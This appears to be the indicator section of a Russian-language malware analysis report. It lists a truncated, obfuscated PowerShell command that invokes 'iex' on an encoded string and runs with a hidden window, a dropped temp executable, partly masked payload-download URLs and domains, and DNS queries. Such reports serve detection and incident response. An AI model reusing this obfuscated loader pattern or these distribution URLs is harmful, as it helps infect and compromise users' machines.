Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $PShoME[21]+$PSHoME[30]+'x')(-JOiN( '63J78<120<66Q84w109n97!59n38x59<117J126<108t54s116s121t113n126Q120!111n59n105Q122!117s127w116a118x32!63a92!120!108J79t113x59!38Q59Q117s126n108w54J116Q121...
- %TEMP%\555863.exe
- %TEMP%\555863.exe
- 'ke###darke.com':80
- 'ke###darke.com':443
- 'tr###und.com':80
- 'iz##rude.ru':80
- 'ap####ahebraico.com':80
- 'ap####ahebraico.com':443
- http://ke###darke.com/oO627b/
- http://tr###und.com/DcYl9Em6FX/
- http://www.iz##rude.ru/QHcziObohJ/
- http://www.iz##rude.ru/site/index
- http://www.iz##rude.ru/
- http://ap####ahebraico.com/wp2/sFm9c9jmV7/
- 'ke###darke.com':443
- 'ap####ahebraico.com':443
- DNS ASK ve###rmd.com
- DNS ASK ke###darke.com
- DNS ASK tr###und.com
- DNS ASK iz##rude.ru
- DNS ASK ap####ahebraico.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $PShoME[21]+$PSHoME[30]+'x')(-JOiN( '63J78<120<66Q84w109n97!59n38x59<117J126<108t54s116s121t113n126Q120!111n59n105Q122!117s127w116a118x32!63a92!120!108J79t113x59!38Q59Q117s126n108w54J116Q121...' (со скрытым окном)